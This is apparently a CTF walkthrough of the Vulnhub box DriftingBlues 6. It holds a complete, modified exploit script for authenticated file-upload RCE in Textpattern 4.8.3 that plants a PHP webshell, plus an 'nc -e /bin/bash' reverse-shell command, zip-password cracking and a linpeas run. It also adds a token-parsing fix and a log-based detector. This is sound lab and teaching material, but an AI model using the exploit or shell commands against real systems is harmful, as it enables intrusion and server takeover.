Vulnhub: Driftingblues 6 box, detailed walkthrough (including the process of modifying exploit code taken from the internet)

Author: jason_huawen

Basic information about the target

Name: DriftingBlues: 6

Address: https://www.vulnhub.com/entry/driftingblues-6,672/

Identifying the target host's IP address

                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.126.0/16   |   Screen View: Unique Hosts                                                                                                                                                               
                                                                                                                                                                                                                                    
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                   
 192.168.56.100  08:00:27:dd:4f:27      1      60  PCS Systemtechnik GmbH                                                                                                                                                           
 192.168.56.195  08:00:27:c2:6e:bd      1      60  PCS Systemtechnik GmbH     

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.195.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.195 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 03:01 EST
Nmap scan report for localhost (192.168.56.195)
Host is up (0.00016s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:C2:6E:BD (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds
                                                                  

The Nmap results show that the target host has a single open port, 80, running an HTTP service.

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ curl http://192.168.56.195/                     
<!DOCTYPE html>
<html>
<title>driftingblues</title>
<body class="gbody">
<style>
.gbody {
        background-color: #f4ecd8;
        width: 1000px;
        margin: 40px auto;
        font-family: arial;
        font-size: 20px;
           }

.gempty1 {
        display: inline-block;
        width: 1000px;
        height: 10px;
        border-bottom: solid 1px #000000;
        }

.gempty {
        display: inline-block;
        width: 1000px;
        height: 70px;
        }

</style>
<span class="main1">
<h1>Drifting Blues Tech
<h2>please don't hack
<h2>enough is enough!!!
<br><br><img src="db.png">
</span>
<span class="gempty"></span>
</body>
</html>
<!-- 



please hack vvmlist.github.io instead
he and their army always hacking us -->  

The returned page source contains a comment. I went to look at the site vvmlist.github.io, which offers attack/defense VMs for download; not sure what use that is here. (Note: it turned out in the end that this information means nothing at all; not sure whether it is just an advertisement.)

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ curl http://192.168.56.195/robots.txt
User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)

Visiting the robots.txt file, the returned content gives two hints:

  1. A directory exists: /textpattern/textpattern

  2. When brute-forcing directories, add the .zip extension (note: after finishing the whole process, this hint does not seem to have been of much use)

Visiting http://192.168.56.195/textpattern/textpattern/ in the browser returns a login page. Rather than rushing to crack this login, first check whether there are other directories.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ nikto -h http://192.168.56.195
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.195
+ Target Hostname:    192.168.56.195
+ Target Port:        80
+ Start Time:         2022-11-20 03:08:32 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server may leak inodes via ETags, header found with file /, inode: 14067, size: 750, mtime: Mon Mar 15 09:36:18 2021
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.38-1~dotdeb+7.1
+ Cookie txp_test_cookie created without the httponly flag
+ Entry '/textpattern/textpattern/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8726 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2022-11-20 03:08:44 (GMT-5) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ gobuster dir -u http://192.168.56.195  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.195
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/20 03:09:27 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]
/spammer              (Status: 200) [Size: 179]
/server-status        (Status: 403) [Size: 295]
Progress: 217403 / 220561 (98.57%)===============================================================
2022/11/20 03:10:02 Finished
===============================================================
                                                                                                                                                                                                                                     

gobuster found several directories; /spammer turns out to be a zip archive. Download it to Kali Linux and try to extract it: it is password-protected, so crack the password with john:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat spammer 
reds.txt-A�J^��
               i�E��Lq8+._��;�lPK?˭oRa�  creds.txt
 ▒�L�}����bi����bi��PK[B                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
db.jpeg  nmap_full_scan  spammer
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ file spammer                          
spammer: Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ unzip spammer    
Archive:  spammer
[spammer] creds.txt password:                                                                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ zip2john spammer > hashes    
ver 2.0 spammer/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D ts=ADCB cs=b003 type=0
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4         (spammer/creds.txt)     
1g 0:00:00:00 DONE (2022-11-20 03:11) 33.33g/s 682666p/s 682666c/s 682666C/s christal..michelle4
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
db.jpeg  hashes  nmap_full_scan  spammer
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ unzip spammer 
Archive:  spammer
[spammer] creds.txt password: 
 extracting: creds.txt               
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
creds.txt  db.jpeg  hashes  nmap_full_scan  spammer
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat creds.txt 
mayer:lionheart                  

Could these be the username and password for the /textpattern/textpattern/ login page? Let's try them.

Ha, the login succeeds!

Browsing the pages, the target site's CMS is identified as Textpattern CMS (version 4.8.3). Let's check whether it has any known vulnerabilities.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ searchsploit textpattern                                   
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                     |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
TextPattern 1.19 - 'publish.php' Remote File Inclusion                                                                                                                                             | php/webapps/2646.txt
TextPattern 4.2 - 'index.php' Cross-Site Scripting                                                                                                                                                 | php/webapps/35571.txt
TextPattern 4.4.1 - 'ddb' Cross-Site Scripting                                                                                                                                                     | php/webapps/36489.txt
TextPattern 4.6.2 - 'qty' SQL Injection                                                                                                                                                            | php/webapps/44277.txt
Textpattern 4.8.3 - Remote code execution (Authenticated) (2)                                                                                                                                      | php/webapps/49620.py
textpattern CMS 4.2.0 - Remote File Inclusion                                                                                                                                                      | php/webapps/14823.txt
Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting                                                                                                                                     | php/webapps/48861.txt
Textpattern CMS 4.6.2 - Cross-site Request Forgery                                                                                                                                                 | php/webapps/48907.txt
TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)                                                                                                                                      | php/webapps/48943.py
Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)                                                                                                                           | php/webapps/49616.txt
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)                                                                                                                                   | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)                                                                                                                             | php/webapps/50415.txt
TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)                                                                                                                                          | php/webapps/49975.txt
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)                                                                                                                        | php/webapps/49617.txt
TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)                                                                                                                         | php/webapps/50095.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                

The search results tell us that this version has an authenticated remote code execution vulnerability, which requires a username and password. We already obtained those above, so the next step is to exploit this vulnerability to get a shell on the target host.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ searchsploit -m  php/webapps/48943.py

  Exploit: TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/48943
     Path: /usr/share/exploitdb/exploits/php/webapps/48943.py
File Type: Python script, Unicode text, UTF-8 text executable

Copied to: /home/kali/Vulnhub/Driftingblue6/48943.py


                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ ls
48943.py  creds.txt  db.jpeg  hashes  nmap_full_scan  spammer
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ mv 48943.py exploit.py  
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat exploit.py 
#!/usr/bin/python3

# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A

(omitted)

Running the script, however, produced an error:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ python exploit.py http://192.168.56.195 mayer lionheart                           

Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino

[*] Authenticating to the target as 'mayer'
Traceback (most recent call last):
  File "/home/kali/Vulnhub/Driftingblue6/exploit.py", line 83, in <module>
    log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
  File "/usr/lib/python3/dist-packages/requests/cookies.py", line 328, in __getitem__
    return self._find_no_duplicates(name)
  File "/usr/lib/python3/dist-packages/requests/cookies.py", line 399, in _find_no_duplicates
    raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
KeyError: "name='txp_login', domain=None, path=None"

Looking at the code more carefully, the url parameter needs to include textpattern (the script itself appends textpattern/index.php to whatever base URL it is given, and on this box the application lives under /textpattern/textpattern/). Run it again:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ python exploit.py http://192.168.56.195/textpattern/ mayer lionheart

Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino

[*] Authenticating to the target as 'mayer'
[✓] Logged in as 'mayer' (Cookie: txp_login=mayer%2C10e487590f7a8c0386b71f85b846c013; txp_login_public=3988843a95mayer)
[*] Grabbing _txp_token (required to proceed with exploitation)..
Traceback (most recent call last):
  File "/home/kali/Vulnhub/Driftingblue6/exploit.py", line 89, in <module>
    scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
AttributeError: 'NoneType' object has no attribute 'replace'

The output shows that this time the login succeeds, but the script then fails with 'NoneType' object has no attribute 'replace', which means the soup extraction is picking the wrong element. After a lot of fiddling, this is how I finally solved it: confirm the information manually first, i.e. submit the login in a browser and inspect the returned page. That shows the target script tag should be at index 3 rather than 2. After changing that index in the exploit code, it ran successfully.

The modified code is as follows:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ cat exploit.py 
#!/usr/bin/python3

# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
# Google Dork: N/A
# Date: 16/10/2020
# Exploit Author: Michele '0blio_' Cisternino
# Vendor Homepage: https://textpattern.com/
# Software Link: https://github.com/textpattern/textpattern
# Version: <= 4.8.3
# Tested on: Kali Linux x64
# CVE: N/A

import sys
import json
import requests
from bs4 import BeautifulSoup as bs4
from time import sleep
import random
import string
import readline

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Simple Terminal User Interface class I wrote to print run-time logs and headers
class Tui ():
    def __init__ (self):
        self.red = '\033[91m'
        self.green = '\033[92m'
        self.blue = '\033[94m'
        self.yellow = '\033[93m'
        self.pink = '\033[95m'
        self.end = '\033[0m'
        self.bold = '\033[1m'

    def header (self, software, author, cve='N/A'):
        print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
        print ("{}CVE:{} {}".format(self.pink, self.end, cve))
        print ("{}Author:{} {}\n".format(self.pink, self.end, author))

    def info (self, message):
        print ("[{}*{}] {}".format(self.blue, self.end, message))

    def greatInfo (self, message):
        print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))

    def success (self, message):
        print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))

    def warning (self, message):
        print ("[{}!{}] {}".format(self.yellow, self.end, message))

    def error (self, message):
        print ("[{}✗{}] {}".format(self.red, self.end, message))

log = Tui()
log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")

if len(sys.argv) < 4:
    log.info ("USAGE: python3 exploit.py http://target.com username password")
    log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
    sys.exit()

# Get input from the command line
target, username, password = sys.argv[1:4]

# Fixing URL
target = target.strip()
if not target.startswith("https://") and not target.startswith("http://"):
    target = "http://" + target
if not target.endswith("/"):
    target = target + "/"

accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}

# Login
log.info ("Authenticating to the target as '{}'".format(username))
s = requests.Session()
try:
    r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
    #print(r.text)
    sleep(1)
    if r.status_code == 200:
        log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
        sleep(1)

        # Parsing the response to find the upload token inside the main json array
        log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
        soup = bs4(r.text, 'html.parser')
        scriptJS = soup.find_all("script")[3].string.replace("var textpattern = ", "")[:-2]
        scriptJS = json.loads(scriptJS)
        uploadToken = scriptJS['_txp_token']
        log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))

    # The server reply with a 401 with the user provide wrong creds as input
    elif r.status_code == 401:
        log.error ("Unable to login. You provided wrong credentials..\n")
        sys.exit()
except requests.exceptions.ConnectionError:
    log.error ("Unable to connect to the target!")
    sys.exit()

# Crafting the upload request here
headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
    "Accept-Encoding" : "gzip, deflate",
    "X-Requested-With" : "XMLHttpRequest",
    "Connection" : "close",
}

# Generating random webshell name
randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'

# Mapping multiparts here
multipart_form_data = {
    "fileInputOrder" : (None, '1/1'),
    "app_mode" : (None, 'async'),
    "MAX_FILE_SIZE" : (None, '2000000'),
    "event" : (None, 'file'),
    "step" : (None, 'file_insert'),
    "id" : (None, ' '),
    "_txp_token" : (None, uploadToken), # Token here
    "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol
}

# Uploading the webshell
log.warning ("Sending payload..")

try:
    r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
    if "Files uploaded" in r.text:
        log.success ("Webshell uploaded successfully as {}".format(randomFilename))
except:
    log.error ("Unexpected error..")
    sys.exit()

sleep(2)

# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
log.greatInfo ("Interacting with the HTTP webshell..")
sleep (1)
print()

while 1:
    try:
        cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
        if cmd == 'exit':
            raise KeyboardInterrupt
        r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
        print (r.text)
    except KeyboardInterrupt:
        log.warning ("Stopped.")
        exit()
    except:
        log.error ("Unexpected error..")
        sys.exit()

print()
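Why the index-based lookup broke, and a sturdier way to do the same parse, as an added example that is not part of the original post or of the exploit-db script: instead of trusting that the configuration script sits at a fixed index (which differs between Textpattern pages and themes), scan every inline <script> for the `var textpattern = ...` assignment and decode it as JSON. The HTML below is a constructed stand-in for the admin page, and the token in it is a placeholder value.

```python
import json
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect every <script> element's attributes and inline body, in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of (attrs, inline_text)
        self._attrs = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs = dict(attrs)
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands script bodies over verbatim (CDATA), so the JSON is untouched.
        if self._attrs is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            self.scripts.append((self._attrs, "".join(self._buf)))
            self._attrs = None


def inline_script_at(html, index):
    """Mimic the exploit's soup.find_all("script")[index].string.

    Returns None when that script is external (src=) or empty, which is exactly
    the case that made .replace() raise AttributeError on this box.
    """
    p = ScriptCollector()
    p.feed(html)
    if index >= len(p.scripts):
        return None
    attrs, body = p.scripts[index]
    if "src" in attrs or not body:
        return None
    return body


def extract_txp_config(html):
    """Find the inline script that assigns `var textpattern = {...};` and return the dict."""
    p = ScriptCollector()
    p.feed(html)
    prefix = "var textpattern ="
    for attrs, body in p.scripts:
        body = body.strip()
        if "src" in attrs or not body.startswith(prefix):
            continue
        payload = body[len(prefix):].strip().rstrip(";")
        try:
            return json.loads(payload)
        except json.JSONDecodeError:
            continue  # some other script happens to start the same way; keep looking
    return None


def extract_txp_token(html):
    """Return the _txp_token value, or None when the page carries no config object."""
    cfg = extract_txp_config(html)
    return cfg.get("_txp_token") if cfg else None


# Constructed stand-in for the admin page returned after login (not captured from the
# target): two external includes and one empty tag come before the config script, so
# index 2 has no inline body while the JSON sits at index 3, matching what the post saw.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<script src="vendors/jquery/jquery.js"></script>
<script src="textpattern.js"></script>
<script></script>
<script>var textpattern = {"event":"article","_txp_token":"0123456789abcdef0123456789abcdef"};
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    print("inline body at index 2:", inline_script_at(SAMPLE_HTML, 2))  # None, as on the box
    print("token:", extract_txp_token(SAMPLE_HTML))
```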

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ python exploit.py http://192.168.56.195/textpattern/ mayer lionheart

Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino

[*] Authenticating to the target as 'mayer'
[✓] Logged in as 'mayer' (Cookie: txp_login=mayer%2C91154435c008b5d82f3d6cb4a3bd62cb; txp_login_public=dfda872e11mayer)
[*] Grabbing _txp_token (required to proceed with exploitation)..
[*] Upload token grabbed successfully (c81aff80d74f9c7e053c5b57df723dde)
[!] Sending payload..
[✓] Webshell uploaded successfully as JYLqdITdSw.php
[*] Interacting with the HTTP webshell..

webshell > 

This gives us a webshell on the target host, but this kind of shell is awkward to work with, so we can spawn another one. The target host also has nc, which makes it easy to get a new reverse shell back:

webshell > which nc
/bin/nc

webshell > nc -e /bin/bash 192.168.56.137 5555

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue6]
└─$ sudo nc -nlvp 5555 
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.195] 59581
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@driftingblues:/var/www/textpattern/files$ 
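From the defender's side, the exploit leaves a recognisable trace in the Apache access log: a POST to Textpattern's file-upload step followed by GETs of a freshly dropped .php file under files/, a directory that should only ever serve static uploads. The detector below is an added example rather than anything from the post; it runs that rule over constructed access-log lines whose timestamps and request sequence are made up to mirror the session above.

```python
import re
from datetime import datetime, timedelta

# Apache "combined" log line, reduced to the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The two request shapes the exploit produces: the upload step of the admin file panel,
# and a PHP file fetched straight out of the files/ directory (any install prefix).
UPLOAD_STEP_RE = re.compile(r"^/(?:[^?]*/)?textpattern/index\.php\?.*\bevent=file\b")
PHP_IN_FILES_RE = re.compile(r"^/(?:[^?]*/)?files/[^/?]+\.php(?:\?|$)")


def parse_line(line):
    """Parse one access-log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["status"] = int(entry["status"])
    return entry


def detect(lines, window=timedelta(minutes=10)):
    """Return (rule, ip, path) alerts in log order.

    php_in_files:     any request for a .php under files/ (PHP should never execute there)
    upload_then_exec: the same, but within `window` of an upload-step POST from the same
                      client, which is the drop-then-use sequence of the exploit above.
    """
    alerts = []
    last_upload = {}  # client ip -> time of its most recent upload-step POST
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        if e["method"] == "POST" and UPLOAD_STEP_RE.match(e["path"]):
            last_upload[e["ip"]] = e["ts"]
        if PHP_IN_FILES_RE.match(e["path"]):
            seen = last_upload.get(e["ip"])
            if seen is not None and timedelta(0) <= e["ts"] - seen <= window:
                alerts.append(("upload_then_exec", e["ip"], e["path"]))
            else:
                alerts.append(("php_in_files", e["ip"], e["path"]))
    return alerts


# Constructed log excerpt (not taken from the box): login POST, upload-step POST, two
# webshell GETs, a legitimate static download, and a stale PHP file hit by another client.
SAMPLE_LOG = """\
192.168.56.137 - - [20/Nov/2022:03:15:01 -0500] "POST /textpattern/textpattern/index.php HTTP/1.1" 200 5123 "-" "python-requests/2.28.1"
192.168.56.137 - - [20/Nov/2022:03:15:03 -0500] "POST /textpattern/textpattern/index.php?event=file HTTP/1.1" 200 312 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.168.56.137 - - [20/Nov/2022:03:15:06 -0500] "GET /textpattern/files/JYLqdITdSw.php?efcd=id HTTP/1.1" 200 54 "-" "python-requests/2.28.1"
192.168.56.137 - - [20/Nov/2022:03:15:20 -0500] "GET /textpattern/files/JYLqdITdSw.php?efcd=which%20nc HTTP/1.1" 200 8 "-" "python-requests/2.28.1"
192.168.56.1 - - [20/Nov/2022:03:16:00 -0500] "GET /textpattern/files/report.pdf HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
192.168.56.1 - - [20/Nov/2022:04:30:00 -0500] "GET /textpattern/files/old.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for rule, ip, path in detect(SAMPLE_LOG.splitlines()):
        print(f"{rule:17} {ip:16} {path}")
```

The same rule doubles as a hardening check: PHP execution should be disabled for the files/ upload directory, so that a dropped script is served as inert text instead of run.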

Privilege escalation

Upload the linpeas.sh script to the /tmp directory on the target host, make it executable, and run it:

www-data@driftingblues:/home$ cd /tmp
cd /tmp
www-data@driftingblues:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
--2022-11-20 03:04:50--  http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: `linpeas.sh'

100%[======================================>] 827,827     --.-K/s   in 0.003s  

2022-11-20 03:04:50 (226 MB/s) - `linpeas.sh' saved [827827/827827]

www-data@driftingblues:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@driftingblues:/tmp$ ./linpeas.sh
./linpeas.sh


          linpeas-ng by carlospolop                                                                                                                                                                                                  
                                                                                                                                                                                                                                     
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                                                                                                                                
                                                                                                                                                                                                                                     
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                                                                                             
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                                                                                                  
                               ╚═══════════════════╝                                                                                                                                                                                 
OS: Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.78-1
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: driftingblues
Writable folder: /run/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)                                                                  
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)                                                                                                       
                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                     

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
                                                                                                                                                                                                                                     
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                                                                                                                                                   
                              ╚════════════════════╝                                                                                                                                                                                 
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                                                                                                                   
Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.78-1                                                                                                           
lsb_release Not Found
                                                                                                                                                                                                                                     
╔══════════╣ Sudo version
sudo Not Found                                                                                                                                                                                                                       
                                                                                                                                                                                                                                     
╔══════════╣ CVEs Check
                                                                                                                                                                                                                                     

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                                                                                                              
/usr/local/bin:/usr/bin:/bin                                                                                                                                                                                                         
New path exported: /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin

╔══════════╣ Date & uptime
Sun Nov 20 03:04:59 CST 2022                                                                                                                                                                                                         
 03:04:59 up  1:06,  0 users,  load average: 0.08, 0.03, 0.05

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                                                                                                                                                                 
sda
sda1
sda2
sda5

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                                                                                                                                            
UUID=5a40899b-5a6a-4039-93bd-f75bc21a8d58 /               ext4    errors=remount-ro 0       1                                                                                                                                        
UUID=c9a5ff49-f528-4594-8e61-b8100cb73bd7 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0

╔══════════╣ Environment
╚ Any private information inside environment variables?                                                                                                                                                                              
